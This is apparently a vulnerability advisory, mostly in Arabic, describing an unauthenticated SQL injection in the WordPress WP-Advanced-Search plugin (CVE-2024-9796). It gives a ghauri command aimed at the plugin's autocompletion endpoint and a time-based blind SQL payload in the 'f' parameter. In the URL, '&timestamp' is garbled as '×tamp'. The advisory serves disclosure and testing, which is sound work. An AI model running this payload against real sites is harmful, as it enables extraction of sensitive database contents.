
WordPress WP-Advanced-Search <= 3.3.9 - حقن SQL غير مصادق عليه
WordPress WP-Advanced-Search <= 3.3.9 - إدخال SQL غير مصادق عليه
إضافة WordPress WP-Advanced-Search لـ WordPress معرضة لإدخال SQL في جميع الإصدارات حتى 3.3.9 شاملة، وذلك بسبب عدم كفاية الهروب في المعامل المقدم من المستخدم وعدم التحضير الكافي لاستعلام SQL الحالي. هذا يتيح للمهاجمين غير المصادق عليهم إضافة استعلامات SQL إضافية إلى الاستعلامات الموجودة بالفعل، والتي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
Type: plugin
CVSS Score: 7.5
CVE: CVE-2024-9796
Slug: wp-advanced-search
رابط التحميل: تحميل wp-advanced-search الإصدار 3.3.9
ghauri -u "https://wpscan-vulnerability-test-bench.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?t=wp_autosuggest&f=words&l=5&type=0&e=utf-8&q=c&limit=5×tamp=19692269759899"
Parameter: f (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (IF - comment)
Payload: t=wp_autosuggest&f=if(now()=sysdate(),SLEEP(9),0)-- wXyW&l=5&type=0&e=utf-8&q=c&limit=5×tamp=13672261755853'